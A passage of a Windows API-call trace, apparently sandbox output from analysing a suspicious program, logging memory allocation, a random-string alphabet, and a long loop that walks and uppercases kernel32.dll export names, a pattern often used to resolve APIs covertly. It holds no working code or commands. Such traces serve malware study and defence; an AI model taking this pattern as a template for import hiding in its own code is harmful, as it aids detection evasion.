lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.677] CloseHandle (hObject=0x0) returned 0 [0076.677] CloseHandle (hObject=0x440) returned 1 [0076.678] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.679] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.679] GetTickCount () returned 0x114bae7 [0076.679] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.679] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.679] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.679] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.680] lstrlenA (lpString="kernel32.dll") returned 12 [0076.680] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.680] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.680] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.680] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.680] lstrlenA (lpString="ADDATOMA") returned 8 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.680] lstrlenA (lpString="ADDATOMW") returned 8 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.680] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.680] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.680] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.680] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.680] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.680] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.680] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.681] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.681] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.681] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.681] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.681] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.681] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.681] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.681] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.681] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.681] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.681] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.681] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.681] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.681] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.681] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.681] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.681] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.681] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.682] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.682] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.682] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.682] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.682] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.682] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.682] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.682] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.682] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.682] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.682] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.682] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.682] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.682] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.682] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.682] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.682] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.682] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.682] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.683] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.683] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.683] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.683] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.683] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.683] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.683] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.683] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.683] lstrlenA (lpString="BEEP") returned 4 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.683] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.683] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.683] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.683] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.683] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.683] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.683] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.683] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.683] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.684] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.684] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.684] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.684] lstrlenA (lpString="CANCELIO") returned 8 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.684] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.684] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.684] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.684] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.684] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.684] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.684] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.684] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.684] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.684] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.684] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.684] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.684] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.684] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.684] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.685] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.685] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.685] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.685] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.685] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.685] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.685] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.685] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.685] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.685] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.685] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.685] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.685] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.685] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.685] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.685] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.685] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.685] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.686] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.686] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.686] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.686] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.686] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.686] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.686] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.686] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.686] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.686] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.686] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.686] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.686] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.687] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.687] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.687] lstrlenA (lpString="COPYFILEA") returned 9 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.687] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.687] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.687] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.687] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.687] 